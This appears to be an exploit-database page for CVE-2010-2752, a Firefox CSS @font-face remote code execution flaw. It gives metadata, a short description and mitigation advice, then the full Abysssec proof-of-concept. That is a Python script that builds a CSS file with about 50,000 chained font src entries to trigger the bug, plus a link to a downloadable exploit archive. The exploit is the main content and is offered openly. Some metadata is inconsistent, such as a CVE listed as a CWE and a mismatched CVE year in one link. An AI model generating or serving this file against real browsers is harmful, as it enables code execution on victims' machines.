header-logo
Suggest Exploit
vendor:
Firefox
by:
Unknown
9
CVSS
CRITICAL
Remote Code Execution
94
CWE
Product Name: Firefox
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2010-2752
CPE: a:mozilla:firefox
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-2752/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0103/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0547/https://www.rapid7.com/db/vulnerabilities/mfsa2010-39-cve-2010-2752/https://www.rapid7.com/db/vulnerabilities/mozilla-seamonkey-cve-2010-2752/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-2752/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2010-2752/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-2752/https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2010-2752/
Other Scripts:
Platforms Tested:
2010

Mozilla Firefox CSS font-face Remote Code Execution Vulnerability

This exploit takes advantage of a vulnerability in Mozilla Firefox that allows remote code execution. By using a specially crafted CSS file, an attacker can execute arbitrary code on the victim's system.

Mitigation:

Upgrade to the latest version of Mozilla Firefox to prevent this vulnerability.
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

 http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/
 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15104.zip (moaub-25-exploit.zip)
 
'''

'''
  Title             :  Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
  Version           :  Firefox
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.mozilla.com
  Impact            :  Crirical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-2752
  
'''

import sys;

myStyle = """
  @font-face {
    font-family: Sean;
    font-style:  normal;
    font-weight: normal;
    src: url(SEAN1.eot);
    src: url('type/filename.woff') format('woff')

"""
i=0
while(i<50000):
    myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n";
    i=i+1

myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n";
myStyle = myStyle + "}\n";
cssFile = open("style2.css","w")
cssFile.write(myStyle)
cssFile.close()

Navigation

Suggest Exploit

Services By CQR